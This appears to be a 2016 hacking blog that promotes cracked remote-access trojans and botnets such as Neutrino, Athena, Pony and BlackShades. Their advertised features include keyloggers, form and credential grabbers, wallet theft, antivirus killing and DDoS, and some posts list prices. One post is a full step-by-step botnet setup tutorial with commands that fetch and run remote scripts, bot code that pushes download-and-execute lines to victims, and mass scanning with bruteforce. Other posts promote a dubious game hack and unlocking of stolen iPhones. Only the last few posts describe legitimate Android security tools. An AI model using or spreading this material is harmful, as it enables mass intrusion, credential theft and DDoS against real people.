Thursday, August 25, 2016

SkyWyder RAT - CRACKED - TeamViewer Hidden, FormGrabber, Botkiller, Keylogger, Disabl

12:38 PM 1 Comment
SkyWyder RAT - CRACKED - TeamViewer Hidden, FormGrabber, Botkiller, Keylogger, Disabl

NEW : Teamviewer HIDDEN Tested on XP/VISTA/WIN7/8/10 x86 and x64 !
- Hidden startup from Regedit and msconfig. Persistent installation
- Cryptochange, replace automatly any Bitcoin address copied on the clipboard by your own one
- SkyWyder Rat is able to bypass any Firewall
- Multiple DNS connection, if one of your address is not reachable, the RAT will automatically connect to the next

- Very easy to use, just enter a URL and that's it. The Formgrabber take charge of recovering all the form data and will also take a screenshot for each login made and click on the url in question
- Download screenshots and logs in a friendly menu
- Capture date of screenshots
- FULL URL of website captured
- Intelligent keylogger, work only when you need it
- You will be able to download only the screenshots you need

- Actually our RAT can kill this list of Malwares, include from memory. No matter if the file is crypted, the RAT will detect and kill it quickly without use any % of CPU.

-Keylogger is hooked in Ring3, so it's never miss any single data, the entire keyboard is hooked without any ms delay.

-Disable the next programs (Without Administration rights!)
(Regedit, CMD, MsConfig, TaskMgr, RestoreSys)

BTC-E Code capture:
-Capture BTC-E Code in RealTime and send it to you very fast with sound notification.

-With Administration Rights our RAT can kill this list of Anti Virus using a .SYS File from memory (You can also use the UAC bypass with this option)

Fake Message:
-You can configure Title, Message, Icon, Buttons of the fake message and also test it before.

To register the ocx files to fix the missing ocx errors.
1. Open a CMD as administrator.
2. Navigate to the SkyWyder folder.
3. type "Regsvr32 ocxname"
4. Type this on every ocx that is included in the folder.


Thursday, August 18, 2016

12:24 AM Leave a Reply

— Google/PTC Login
— Farm PokeStops
— Catch Pokemon
— Auto Transfers with multiple settings
— Inventory Management
— Simple Start/Stop Bot functionality
— Set Coords


Wednesday, August 10, 2016

Exonet + Source [Botnet C#]

11:55 AM Leave a Reply
Exonet + Source [Botnet C#]
I just wanted to show you a nice Botnet with http control center, called Exonet...
It's very good to learn from as the source is included as well.

- Shutdown PC
- Lock PC
- Send Message
- Download & Execute
- DDoS
- Included Builder

There is no backdoor etc. in it, if you don't believe me, don't download it !


Umbra Loader 1.1 [BotNet] Tutorial + Download Link

11:54 AM Leave a Reply
Umbra Loader 1.1 [BotNet] Tutorial + Download Link

How to Setup Umbra Loader

Step 1: Unrar all the files and upload all the files in the Panel folder into the webhosting using Filezilla and Chmod all those files to 777

Step 2 : Now Create a sql database in mysql and note those login details

Step 3 : Open the config.php in /Panel/Panel/inc/config.php and put your sql details and panel login username and password there

Step 4 : Open this url in your browser
this will install all the sql tables and delete the install.php you're good to go

Step 5 : login to your panel with your username and password


Pony 2.0

11:51 AM Leave a Reply
Pony 2.0

What does it steal ?

System Info
FAR Manager
Total Commander
FTP Commander
BulletProof FTP
CoffeeCup FTP / Sitemapper
FTP Explorer
Frigate3 FTP
Directory Opus
FreeFTP / DirectFTP
32bit FTP
FTP Control
FTP Voyager
Odin Secure FTP Expert
FTP Surfer
Internet Explorer
Google Chrome
Chromium / SRWare Iron
Bromium (Yandex Chrome)
Comodo Dragon
Global Downloader
Easy FTP
Notepad + +
CoffeeCup Visual Site Designer
FastStone Browser
sherrod FTP
Windows Mail
Windows Live Mail
The Bat!


Andromeda v2.06 HTTP Botnet

11:43 AM Leave a Reply
Andromeda v2.06 HTTP Botnet
Versatile modular bot. Based on this product, you can build a botnet with a limitless variety of possibilities. The functional bot expanded with the help of plug-ins that can be loaded in the right quantity and at any time.
Not limited by the number of backup support for domains.
The protocol for data exchange between the bot and the admin panel is encrypted using RC4.
Modular. You can convert your botnet to your needs at any time.
The system does not agresiven for installation does not require administrator rights, UAC does not pop up window.
Protect yourself, is not prepared by the user will not be able to remove the bot from the system.
Traverses firewalls without palitsya in the processes used to inject a trusted process.
Do not throw yourself out of any DLL, does not include TLS, it is easy to crypt.
Regardless of the success of the original installation exe is removed.
Works on the line from WinXP to Win7 x64 systems including.
Small size, written entirely in assembly language.


Athena HTTP Botnet v.1.0.8 + BUILDER

11:35 AM Leave a Reply
Athena HTTP Botnet v.1.0.8 + BUILDER
Hi guys,
Today I bring you the new Athena HTTP Botnet cracked and fully functional.
All the instructions about how to set it up are inside the, but if you have any doubt about how to set it up just tell me and I'll make a post explaining it.

This botnet has:
- Advanced BotKiller
- DDOS Functions (LOTS)
- Basic Botnet Functions (Download - Install)
- WebChecker
- Many MOAR


P2P Botnet Files and Sales

11:31 AM Leave a Reply
P2P Botnet Files and Sales
..:: Sinden's LizardSquad <b style="color:#000;background:#ffff66">Botnet</b> <b style="color:#000;background:#66ffff">Tutorial</b> ::..

LIST OF COMMANDS: http://<b style="color:#000;background:#ffcc99">pastebin</b>.com/raw.php?i=kiVSGX2u

• Introduction:
Hello my name is Sinden. I'm currently thinking about quitting from this community so felt obliged to
leak this very nice protocol w/ <b style="color:#000;background:#66ffff">tutorial</b>. Please show your support and appreciation and comment below!

• What You Will Need:
- 2 x Virtual Private Servers
* [At least 4GB RAM] [Centos 6 Or Below Is Recommended!]
- My Custom Files
* [Server.c ""; client.c ""]
- Custom LRAB Scanner
* ""
- Dedicated Scanning Server
* [Any Server That Is Capable Of Mass TCP Scanning]

TIP: Good Server Hosts:
!* - Ecatel -
!* - VPSDime -
!* - -
!* - LeaseWeb -

• Getting Your Server Ready:
!* - First you will need to install all the dependencies and repositories on your hosting server to run everything as smooth as possible

1. [Centos] - Run this command *NOTE Run this on both your servers!
Command: "wget http://<b style="color:#000;background:#ffcc99">pastebin</b>.com/raw.php?i=Nd1PkEz0 -O update; chmod 777 update; sh update"

!* - Once this has completed you are going to have to configure your <b style="color:#000;background:#ffff66">botnet</b> server. *Note If you're running any other distro edit the update file to apt-get.

2. Run "wget -O server.c; nano server.c" and edit this part
#define MY_MGM_ADMINP "Password"
#define MY_MGM_ADMINU "User"
#define MY_MGM_MATENP "Password"
#define MY_MGM_MATENU "User"
#define MY_MGM_USERP "Password"
#define MY_MGM_USERU "User"
#define MY_MGM_GUESTP "Password"
#define MY_MGM_GUESTU "User"
#define MY_MGM_PORT 6969
This is the login and port settings for the <b style="color:#000;background:#ffff66">botnet</b> protocol. Edit the four clients that look like this "Password" "User".

!* - Once you have edited the file exit and save all changes.

3. Run "gcc -o server server.c -pthread; screen ./server 164 1000" and then once the screen process hold CTRL + A and press D.

!* - That command has disconnected you from the server screen process but will still always be running in the background.

4. Run "yum install nc -y --skip-broken" or "yum install netcat -y --skip-broken"

5. Run "nc localhost 6969"

!* - This should prompt you with a login screen. Use the credentials that you edited in the file.

6. Press CTRL + C to exit and open your secondary server.

!* - This secondary server is your Apache host for your binary's.

7. Run "service httpd start" then "cd /var/www/html"

8. Run "wget -O arch-wget; sh arch-wget; rm -rf arch-wget"

9. Run "wget -O client.c; nano client.c"

!* - Now this is were you need to pay attention and read carefully.

!* - Find this part in the client.c
// ___ __ _
// / __\___ _ __ / _(_) __ _
// / / / _ \| '_ \| |_| |/ _` |
// / /__| (_) | | | | _| | (_| |
// \____/\___/|_| |_|_| |_|\__, |
// |___/

unsigned char *commServer[] =
"IP:PORT" //Start the server on this port

10. Edit the IP to your <b style="color:#000;background:#ffff66">botnet</b> server host and your port to "164"

!* - Find this part of the code on line 990
if(send(fds[i].fd, "wget http://IP/ -O /tmp/; sh /tmp/; rm /tmp/\r\n", 79, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }

11. Edit the IP in the wget to the server that's hosting your binaries and change all the file names to what you want your file name to be *NOTE Must end with .sh

!* - Now you need to change the character count and thats this part in that line of code

!* - You need to open a code editor e.g Notepad++ or Sublime text that shows character count.

e.g "wget http://IP/ -O /tmp/; sh /tmp/; rm /tmp/\r\n" the charactor count is 72 *Note Remember "\r\n" you only count the letters not "\".

!* - Once you have edited that file exit and save.

12. Run "wget -O comp; sh comp client.c"

!* - This will automatically compile your bot to all 12 architectures.

13. On the Apache host server run "wget -O" *NOTE change the name of the file according to what you named it in client.c

14. Run "nano" and edit all the parts with the part "IP" to the IP that's hosting your binaries

!* - Check the Apache host IP on your browser like ip/ to check if the file downlaods

..:: END OF <b style="color:#000;background:#ffff66">BOTNET</b> SETUP... CONTINUE TO LEARN HOW TO ADD BOTS ::..

!* - Login into your scanning server

1. Run "yum install unzip -y --skip-broken"

2. Run "cd /var/opt; mkdir .scan; cd .scan; wget; unzip; cd LRAB"

3. Run "wget http://<b style="color:#000;background:#ffcc99">pastebin</b>.com/raw.php?i=AwEqTNTA -O; nano"

!* - Find this line
$channel->exec('wget http://IP/ -O /tmp/; sh /tmp/; rm /tmp/');

4. Edit the IP and file name to your binary host IP and .sh file name and save and exit.

5. Run "wget http://<b style="color:#000;background:#ffcc99">pastebin</b>.com/raw.php?i=enUdaRrk -O mass"

6. Run "nano mass" and only edit the ranges accept if your interface isn't eth0. *Note You have a complete choice on what ranges you want to scan.

7. Run "screen sh mass" and then hold CTRL+A and press D to de-attach from screen.

!* - Once the scan is done it will automatically start to bruteforce.

*NOTE: To check if the scan is done run "ps -A | grep class" and to check if the bruteforce is still running "ps -A | grep update"

8. To finally add the bots to your net run the finished vuln by typing "perl vuln.txt"


Friday, August 5, 2016


2:33 PM Leave a Reply
So many fake clash of clans hacks. A buddy of mine showed me this simple trick to get unlimited everything. The trick is called "God-Of-Gems". It's a very simple program. The program will get you a .ipa that you will later import into your device using "I-Funbox".


ENJOY! PLEASE EMAIL: for setup help!

Gems hack
Gold hack
Elixir hack
User-friendly design
Android/iOs/Social platforms compatible
Jail break require: NO
Root require: NO
100% virus safe
Automatic update check
Many other resources


Neutrino HTTP Botnet cracked! BUILDER + PANEL | DDOS | FORMGRAB | LOADER!

2:31 PM Leave a Reply
Neutrino HTTP Botnet cracked! BUILDER + PANEL | DDOS | FORMGRAB | LOADER!

Neutrino Bot

- The main functional
* HTTP (S) flood (methods GET \ POST)
* Smart DDoS
* AntiDDOS flood (Emulation js \ cookies)
* Slowloris flood
* Download flood
* TCP flood
* UDP flood

* Loader (exe, dll, vbs, bat ... + can specify parameters for running the file)
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window)
* Command shell (remote command execution using shell windows)
* Stealing files by mask (eg bitcoin wallets)
* Launch the browser with one of these links (aka Cheaters views)
* Spoofing Hosts
* Stilling Win keys
* Reproduction (USB \ Archive)
* Purity downloads (number found "neighbors" on the computer)
* Identifying the installed AV (on all Windows except Server)
* Update
* Work through the gasket

- Additional Features
* Anti debugging
* AntiVM
* Detect sandboxes
* Detect all online services automatic analysis
* BotKiller

* Bot protection (protection process \ file \ registry branches)
* Unlimited number of concurrent commands (Some teams have a higher priority than others, and their execution stops others)
* Unlimited number of backup domain
* Quiet operation even under a limited account
* Do not load the CPU

- Functional admin
* Flexible system for creating jobs
* Detailed statistics for bots
* Ability to give commands to each country separately or bot
* Customizable otstuk bots
* Sort bots in Articles IP \ Live \ Country \ OS
* System Bans.

- Weight uncompressed binary file ~ 50kb (PL - C)
- Boat tested on the entire line of Windows, from XP to 8.1 (x32/64)

tags -
Full set (+ bot + admin panel to build an unlimited number of domains) - $ 200
Rebuild (also unlim. Quantity domains) - $ 10
Update (functional) - $ 20
Builder - $ 550
Payment - WM \ BTC \ Perfect



2:29 PM Leave a Reply
#1: A seperate option for Cryptocurrency miner proactive defense was added because the "General proactive defense" is still too effective to run successfully on a net that you download other tools to. We recommend you keep "General proactive defense" OFF unless you know what you are doing

#2: The live login grabber has undergone some relatively decent changes. First, some ssl pop3 sessions, and to a more limited degree, ftp as well, are able to be inspected. SSL POP3 grabber does not grab ALL email logins over SSL as each mail client has their own ways of handling cryptography. However Outlook and some others are supported which in turn has drastically boosted the number of relevant logins able to be captured. Valuable logins such as Hotmail/Live and GMail are now more prevelant. Lastly, if the bot is able to determine what domain was used to contact the server, it will be sent instead of the IP address.

#3: Not all tasks report more detailed information. Currently only download/update/botkill tasks are informative

#4. AVKill development has stopped for the time being and some methods have been removed. AVKill will not be nearly as effective for this reason.


BlackShades 5.1 Crack, Solar Botnet, njRAT and more!

2:26 PM 1 Comment
BlackShades 5.1 Crack, Solar Botnet, njRAT and more!
I'm pretty new here and I'd like to share some things I've picked up over time. It is a bundle of some RATs and Solar Botnet. The bundle includes.
Blackshades 5.1 (cracked by MyrSire Tehe)
BlueBanana (Java RAT)
Jrat 4.1.9 (Java RAT with ALL plugins Cool)
Jspy (a newer Java RAT)
Loki RAT (PHP rat, no portforwarding)
njRAT (Another great DarkComet alternative
Solar Botnet (the best botnet imo)
Screenshot (Big Picture)


StonedCat Botnet | HTTP Botnet | Better Then Athena/BetaBot

2:22 PM Leave a Reply
StonedCat Botnet | HTTP Botnet | Better Then Athena/BetaBot
I am re-leaking this. It is only available on a few sites that you either have to pay $700 for access, other sites you need huge reputation, or pay legit to ($1,000 - $3,000)

Point is, I have no idea how to use this. I don't know if it's the source code, much anything. It does have an .apk in there somewhere, and the panel for it. Let me know what you guys discover here.

Feel free to run/download in Sandbox or VM. Decompile, scan, whatever you need. I have no interest infecting members.



Diamond fox botnet FULL LICENSE

2:20 PM Leave a Reply
Diamond fox botnet FULL LICENSE
Download and the execute (in a memory)
Download and the execute (on disk)
the Open the website of (the Visible)
the Open the website of (the Hidden)
the UDP Flood
the HTTP Flood
the Enable / the Disable the Host Editor is
the Enable / the Disable the PoS Grabber
Spam with the bots (the inbox)
the Bitcoin Wallet Stealer
with Facebook / Twitter spread the Message
of Firefox homepage equipmentCD changer
the Enable / the Disable Keylogger
of Take screenshot The
the Password Grabber (Chorme, of Firefox, of Opera, IExplore, the Safari)
the FTP Grabber (Filezilla)
the Instant the Messaging the Password Grabber
Grab the EMAIL, the SMTP, the POP3 and the IMAP
the Update the bot
the Uninstall


Neutrino v3.6 HTTP Botnet | DDoS | Formgrabber | CCGrabber | FTP & Password Grabber

2:16 PM Leave a Reply
Neutrino v3.6 HTTP Botnet | DDoS | Formgrabber | CCGrabber | FTP & Password Grabber
This is leaked Neutrino HTTP 3.6.

Thread has been google translated from russian
- Basic functionality
* HTTP (S) flood (methods GET \ POST)
* AntiDDOS flood (Emulation js \ cookies)
* Slowloris flood
* Download flooding
* TCP flood
* UDP flood

* Loader (exe, dll, vbs, bat ... + possibility to specify the parameters for the start of the file)
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window)
* Command shell (remote command execution via shell windows)
* Stealing files by mask (eg bitcoin wallets)
* Launch the browser with one of these links (aka Cheaters views)
* Substitution Hosts
* Stilling Win Key
* Reproduction (USB \ Archive)
* Purity downloads (amount found "neighbors" on the computer)
* Identifying the installed AV (on all Windows except Server)
* Update
* Work through the gasket

- Additional functions
* Anti debugging
* AntiVM
* Detect sandboxes
* Detect all online services, automatic analysis
* BotKiller

* Bot protection (protection process \ files \ registry branches)
* Unlimited number of simultaneous commands (Some commands have a higher priority in relation to others and their performance stops, etc.)
* Unlimited number of backup domain
* Quiet operation even under a limited user account
* Do not load the CPU

- Functional admin
* A flexible system of creating jobs
* Detailed statistics on bots
* Ability to issue commands to each country individually or bot
* Customizable bots otstuk
* Sort bots in the articles on IP \ line \ Countries \ OS
* The system bans.

- Weight uncompressed binaries ~ 50kb (PL - C)
- Boat tested on the entire line of Windows, starting with XP to 8.1 (x32 / 64)

Price tags -
Complete kit (Admin + bot + build an unlimited number of domains) - $ 200
Rebild (also Unlim. Number of domains) - $ 10
Update (functional) - $ 20
Builder - $ 550
Payment - WM \ BTC \ Perfect

Binaries licensed, drain - remains without support.

PM or /


UPDATE to version 2.2
* The algorithm of communication with the server.
* Improved protection scheme admin.
* All merge files \ logs are now displayed in the article ip; filiname; date; size and convenient search.

* Fixed a bug with the file names generated when installs.
* Improved the keylogger logs is now more readable.
* Minor fixes.

Update 2.9.
* Reworked all types of attacks, a temporary fixed "attack" when bots from online attacks.
* Reworked the keylogger is almost no waste, it is possible to monitor several windows at once and, if necessary, disable the removal of screenshots.
* Reworked grabber track1 + track2 - Number of waste in the log is nearing zero.
* Many small changes and extensions.
* Added a call to errors with the specified text when it detects virtual ok \ sandboxes, etc.

* Changed the scheme of protection within the admin.
* Changed the return teams now Admin works correctly in combination with certain antiddos protection.
* Increased speed of admin, which is especially noticeable on slower servers with a large number of bots.
* At the request of customers added the ability to upload files to the server through the admin panel.

Blog notes and the FAQ is currently unavailable, but comes complete with bot FAQ (RU \ EN).
Customers who wanted a monopoly on the use of certain functions: if the desire remains - knock, all talk.

Functional grabber track1 + track2 available as a module in the standard supply does not include the price of the unit is $ 150.
New customers the price before the end of next week the same, but after rising to $ 300 for a standard without functional modules.
For payment are accepted only temporarily BTC, but for old customers who want to upgrade the product available for payment through WebMoney.
[06:51:07] Troy Rad: Update 3.0.
This update is available as a plug-formgrabber -
-Firefox HTTP + SSL
-Internet Explorer HTTP + SSL
-Chrome HTTP

Logs with formgrabbera available in a user-friendly admin statistics.
Price plug - $ 200
For customers with a full version of the bot module cost - $ 50
3.1 Update:
[+] Formgrabber:
- Added Opera.
- Changed filter formgrabbera.

[+] Admin:
- Changed the protection scheme admin.
- Fixed some minor bugs.
I apologize to all our customers for their long absence - because of the problems with most of the iron sortsy / data has been lost, so we had to start over almost from the beginning.
In connection with this update and change 3.2 -

* Almost completely rewritten formgrabber:
- Added grabbing SSL Chrome.
- Added check the status of hooks in the browser.

* Track1 / 2 grabber -
- Removed team at grabbing dump - now grabber is constantly at work.
- Added a convenient conclusion to the admin panel ripped dump type - Bot ip / Track type / Track data / Process name / Date.

* It is also almost completely rewritten botkiller:
- Now the bot kills 98% of bots.
- Changed the scheme of collecting statistics about detected bots.

* Keylogger
- Now you can keep track of all the windows for that instead of the window, specify - "ALLWINDOW"

* From the list of excluded hidden functional browsing.

Update 3.3
* Added ability to register multiple users
* Changed the export of logs, are now large volumes exported more bright

* Added functionality FTP sniffer work tested with the following customers:
- FileZilla
- WinSCP
- Smart FTP
- Cute FTP
- FTP Rush
- Core FTP
- CoffeeFreeFTP
- FlashFXP
- Total Commander

(*) If you require a client is not listed, knock - add.

- New:
* Rewrote the track 1/2 grabber.
* Updated grabbing SSL chromium.
* Check function on Windows 10
* Improved protection scheme admin.
* Updated GeoIP

- Fixed:
* FTP Sniffer
* Fixed a bug with the counters in the admin tasks.

- Removed:
* Hosts changer


ALWAYS USE 21232f297a57a5a743894a0e4a801fc3 AS AUTH KEY!

Thursday, August 4, 2016

How To Factory Unlock Your IPhone Rite from your Home

1:35 PM Leave a Reply

Recently i came across a website where you can Factory unlock any iPhone permanently rite from you home .I Factory unlocked my iphone 5 locked To AT&T in just 6 hours .

Why to unlock your iPhone what difference will it make ? 

  • After unlocking you can use your iphone with any Gsm carrier in the world . Means you can shift  to any carrier that best suits  your needs .
  • Unlike soft ware or hardware unlocks this wont void your warranty .
  • Its safe and fast you just need to order the unlock , and restore your iphone from itunes  to get it unlocked as simple as that .
  • You can increase the resale value of your iphone .
  • you can even unlock black listed , stolen or insurance claimed phones . they will work normally like a factory unlocked phone after unlocking 
 What models are supported ?

 The big thing is you unlock almost all iPhone models from 40 countries and 500 different carriers around the world . supports all base bands and firmware versions . 

unlike software unlocks or jailbreaks , This is a permanent solution you just need to unlock it once and you iphone will stay unlocked forever .You can update IOS, sync with iTunes ,change Sim cards when ever you like with of the fear of ever re locking again

Visit Site

Reverse Engineering Android apk Files: Apktool

1:25 PM Leave a Reply
Reverse Engineering Android apk Files: Apktool

Reverse Engineering Android apk Files

ApkTool is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.

Live Platform for Android Security Professionals: Android Tamer

1:24 PM Leave a Reply
Live Platform for Android Security Professionals: Android Tamer

Live Platform for Android Security Professionals

      AndroidTamer started out as a VirtualMachine for Android Security Professionals.  This Environment allows people to work on large array of android security related task’s ranging from Malware Analysis, Penetration Testing and Reverse Engineering. AndroidTamer is, at this point the only fully non-commercial non-sponsored entity in Android Security ecosystem.
Android Tamer can work with as little as 512Mb RAM, however if you plan on keeping the eclipse environment running it is suggested to pack at east 1G – 1.5G ram.  Customized to the core, Debian 8 based virtual machine environment is preloaded with tools for Android Pentesting.  AndroidTamer Virtual Machine is a 5.1 GB OVA file ! A lot can be stored in 5GB and you can find all the tools stored inside /Arsenal Folder. Repos have been tested on Debian 8 and they should also work on Kali Linux and Ubuntu 14.04 or 16.04.

Analyze Mobile Phone Metadata: bandicoot

1:23 PM Leave a Reply
Analyze Mobile Phone Metadata: bandicoot

Analyze Mobile Phone Metadata with  bandicoot

     bandicoot ( ) is Python toolbox to analyze mobile phone metadata. It provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results. It includes an interactive visualization, support for mobile phone recharges, support for Python 3, and clustering algorithms to handle both antenna and GPS locations.
bandicoot provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results.  There are 1400+ behavioral indicators that are falling into three categories: individual(e.g. number of calls, text response rate), spatial (e.g. radius of gyration, entropy of places), and social network (e.g. clustering coefficient).  bandicoot also has built-in visualization tools. Load a user’s file and visualize his social graph, mobility pattern, and interactions. Check out our IPython notebook for live examples.

AndroBugs Framework

1:21 PM Leave a Reply
AndroBugs Framework

AndroBugs Framework

    AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate.


  • Find security vulnerabilities in an Android app
  • Check if the code is missing best practices
  • Check dangerous shell commands (e.g. “su”)
  • Collect Information from millions of apps
  • Check the app’s security protection (marked as <Hacker>, designed for app repackaging hacking)


  • Python 2.7.x (DO NOT USE Python 3.X)
  • PyMongo library (If you want to use the massive analysis tool)

androBug Framework ScreenShot

Setup Steps and Usage for Windows

Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework
  1. mkdir C:\AndroBugs_Framework
  2. cd C:\AndroBugs_Framework
  3. Unzip the latest Windows version of AndroBugs Framework from Windows releases
  4. Go to Computer->System Properties->Advanced->Environment Variables. Add “C:\AndroBugs_Framework” to the “Path” variable
  5. androbugs.exe -h
  6. androbugs.exe -f [APK file]

Usage for Unix/Linux

To run the AndroBugs Framework:
python -f [APK file]
To check the usage:
python -h

Usage of Massive Analysis Tools for Unix/Linux

Prerequisite: Setup MongoDB and config your own MongoDB settings in “androbugs-db.cfg”
To run the massive analysis for AndroBugs Framework:
python -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input directory] -o [Report output directory]
python -b 20151112 -t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports
To get the summary report and all the vectors of massive analysis:
python -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag]
python -m massive -b 20151112 -t BlackHat

Mobile Application Reverse Engineering: MARA

1:20 PM Leave a Reply
Mobile Application Reverse Engineering: MARA

Mobile Application Reverse engineering and Analysis Framework

    MARA is a Mobile Application Reverse engineering and Analysis Framework. It is a tool that puts together commonly used mobile application reverse engineering tools, in order to make the task or reverse engineering and analysis easier and friendly to mobile application developers and security professionals.

SS7 Pentesting Toolkit: ss7MAPer

1:18 PM Leave a Reply
SS7 Pentesting Toolkit: ss7MAPer

SS7 Pentesting Toolkit

     The toolkit is build upon the Osmocom SS7 stack and implements some basic MAP messages. At its current state tests against the HLR are ready for use, in future versions tests against VLRMSCand SMSC will follow. The tool is written in Erlang; to get it running you will need the Erlang runtime environment. It is developed for version 17.5.
Signalling System No. 7 (SS7) is a set of telephony signaling protocols developed in 1975, which is used to set up and tear down most of the world’s public switched telephone network (PSTN) telephone calls. It also performs number translation, local number portability, prepaid billing, Short Message Service (SMS), and other mass market services.